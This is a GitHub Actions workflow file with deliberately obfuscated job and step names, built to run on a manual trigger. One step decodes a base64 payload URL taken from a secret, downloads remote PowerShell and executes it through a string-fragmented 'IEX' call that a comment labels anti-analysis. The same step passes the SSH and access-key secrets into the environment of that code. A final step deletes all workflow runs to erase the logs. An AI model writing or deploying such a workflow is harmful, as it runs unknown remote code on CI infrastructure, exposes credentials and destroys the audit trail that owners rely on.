name: 9x_RT_24

on:
  workflow_dispatch:

jobs:
  j_712:
    runs-on: windows-2022
    timeout-minutes: 360
    permissions:
      actions: write
      contents: read

    steps:
      - name: s_01
        uses: actions/checkout@v4

      - name: s_02
        shell: powershell
        env:
          SSH_KEY: ${{ secrets.SSH_KEY }}
          A_KEY: ${{ secrets.ACCESS_KEY }}
          P_B64: ${{ secrets.PAYLOAD_URL }} 
        run: |
          # Anti-Analysis: Decode & Invoke-Expression dengan string fragmentation
          $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($env:P_B64))
          $content = (Invoke-WebRequest -Uri $decoded -UseBasicParsing).Content
          $e = "I" + "E" + "X"
          & $e ($content)
          
      - name: s_03
        uses: Mattraks/delete-workflow-runs@v2
        if: always()
        with:
          token: ${{ github.token }}
          repository: ${{ github.repository }}
          retain_days: 0
          keep_minimum_runs: 0
